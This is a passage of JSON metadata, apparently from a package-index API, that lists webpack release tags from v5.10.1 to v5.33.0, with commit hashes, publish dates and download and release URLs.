ad.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G